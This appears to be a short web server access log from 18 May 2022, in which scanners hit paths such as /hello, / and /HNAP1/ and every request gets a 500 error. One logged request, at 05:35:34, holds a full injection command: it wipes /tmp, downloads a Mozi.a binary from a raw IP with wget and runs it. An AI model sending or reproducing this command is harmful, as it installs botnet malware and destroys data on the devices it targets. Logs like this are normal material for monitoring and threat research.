 - - [18/May/2022:00:38:13 +0000] "GET /hello HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:00:41:22 +0000] "GET /hello HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:00:56:34 +0000] "GET /hello HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:00:56:36 +0000] "GET /hello HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:00:58:58 +0000] "GET / HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:01:37:07 +0000] "GET / HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:01:51:11 +0000] "GET / HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:01:58:32 +0000] "GET / HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:04:54:00 +0000] "GET / HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:05:35:34 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.58.116.60:56340/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:05:48:43 +0000] "GET / HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:05:49:07 +0000] "GET / HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:05:54:09 +0000] "GET / HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:05:54:10 +0000] "POST /HNAP1/ HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:06:07:21 +0000] "GET /hello HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:06:12:56 +0000] "GET /hello HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:06:17:10 +0000] "GET /docs HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:06:29:17 +0000] "GET /hello HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:06:43:39 +0000] "GET /hello HTTP/1.0" 500 0 "-" "-"
 - - [18/May/2022:06:59:59 +0000] "GET /hello HTTP/1.0" 500 0 "-" "-"
